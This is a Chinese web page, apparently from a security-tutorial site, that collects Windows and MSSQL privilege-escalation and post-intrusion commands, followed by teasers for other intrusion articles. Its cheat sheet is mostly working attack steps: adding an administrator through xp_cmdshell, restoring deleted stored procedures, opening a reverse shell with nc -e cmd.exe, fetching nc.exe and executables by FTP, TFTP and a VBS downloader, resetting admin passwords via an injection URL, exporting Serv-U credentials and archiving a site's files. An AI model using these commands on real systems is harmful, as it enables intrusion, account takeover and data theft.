提权总结整理贴

所属分类: 实用技巧 / 安全教程 阅读数: 1413
收藏 0 赞 0 分享
y-2k 的 

 
权限设置
cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览
cacls d:\website /g everyone /e /t授与完全控制
cacls d:\website /r everyone /e /t取消完全控制
SA加系统用户
exec master.dbo.xp_cmdshell 'net user admin admin /add'

exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

恢复扩散
dbcc addextendedproc ("sp_OACreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

如果恢复不了的解释:
因为管理员是直接删除dll文件,而没删除存储过程,你这样恢复肯定是提示存储过程已存在了。你要先删除存储过程,use master
EXEC sp_dropextendedproc 'xp_cmdshell'

然后上传xplog70.dll到某个目录,例如C盘根目录,然后执行
use master dbcc addextendedproc('xp_cmdshell','c:\xplog70.dll')
就可以使用cmdshell存储过程执行系统指令了。

MB的没想到网关都能用NB这样设..落伍啦.落伍啦
把他设置成网关看看行不行.在NBSI执行命令那里输入:echo interface ip >ip.txt
echo set address "Backup" static 10.90.90.157 255.255.255.0 10.90.90.14 1 >>ip.txt
netsh exec ip.txt
这样就把网关设置为10.90.90.14了,然后我们ipconfig看看是不是有网关了,

echo interface ip >1.txt
echo set address "本地连接" static 192.168.1.2 255.255.255.0 192.168.1 254 1 >>1.txt
netsh exec 1.txt

address"本地连接的名称" 可以用ipconfig得到. static IP地址 子网掩码网关地址。
好了现在我PING下163看看能不能PING通,如图8

命令行FTP下载文件
echo open ip >11.txt
echo user >>11.txt
echo pass >>11.txt
echo get nc.exe >>11.txt
echo bye >>11.txt
ftp -s:11.txt

NC做反弹SHELL
在本地监听1234端口 nc -vv -l -p 1234

然后在NBSI执行命令那里nc -e cmd.exe ip 1234

改密码地
http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'-- [admin为表名.]

查看系统在线用户
query user
注销用户
logoff
D:\web\rar.exe a -k -r -s -m1 D:\web\zhu.rar D:\web\
把站点打包到zhu.rar里,

参数说明:

a 添加文件到压缩文件中

-k 锁定压缩文件

-s产生固体存档,这样可以增大压缩比

-r包括子目录

-m1 设置压缩比

-m0 存储 添加到压缩文件时不压缩文件。
-m1 最快 使用最快方式(低压缩)
-m2 较快 使用快速压缩方式
-m3 标准 使用标准(默认)压缩方式
-m4 较好 使用较好压缩方式(较好压缩,但是慢)
-m5 最好 使用最大压缩方式(最好的压缩,但是最慢

直接 D:\web\rar.exe a -r D:\web\zhu.rar D:\web\ 效果一样

exec xp_cmdshell 'echo 内容 >>绝对路径'

sc stop MSSQLSERVER
sc config MSSQLSERVER start= disabled

导SERV-U用户.和密码,不过现在版本密码加密了``

regedit /e "D:\hosting\wwwroot\systones_com\htdocs\su.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\"

导入是regedit /s xx.reg

端口:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

tftp -i serverip get xx.exe

TFTP –I 127.0.0.1 get common.dll c:\common.dll

VBS
--
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://127.0.0.1/u.txt",0 '下载文件的地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\jp.exe",2

VPN
关防火和Application Layer Gateway Service

3389登陆
mstsc /console /v:IP:终端端口
更多精彩内容其他人还在看

MySQL注入中导出字段内容的研究通过注入导出WebShell

大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
收藏 0 赞 0 分享

Dedecms getip()的漏洞利用代码

flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:
收藏 0 赞 0 分享

NtGodMode.exe任意密码登录windows系统帐号下载

NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、不破坏被入侵主机系统的情况下,登录系统帐号。
收藏 0 赞 0 分享

dvbbs 8.2 SQL Injection注射漏洞分析

利用方式:一个典型的sql注射漏洞,按照公告里说的用
收藏 0 赞 0 分享

整理比较全的Access SQL注入参考

不知谁整理的access sql注入资料比较全
收藏 0 赞 0 分享

SQL Injection with MySQL 注入分析

本文作者:angel文章性质:原创 国内能看到php+Mysql注入的文章可能比较少,但是如果关注各种WEB程序的漏洞,就可以发现,其实这些漏洞的文章其实就是一个例子。
收藏 0 赞 0 分享

入侵ASP.net网站的经验附利用代码

爱好入侵的可以用下面的方法,做网站的朋友就需要了解下面的asp.net的利用代码,最好来测试下
收藏 0 赞 0 分享

黑鹰VIP教程-脚本入侵班全部提供下载

爱好脚本的朋友有福了,脚本入侵班资料下载
收藏 0 赞 0 分享

非常不错的脚本入侵基础知识总结第1/2页

简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。
收藏 0 赞 0 分享

linux提权用的一个技巧

一个linux提权用的技巧,放出来全当找工作攒RP了。 OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本
收藏 0 赞 0 分享
查看更多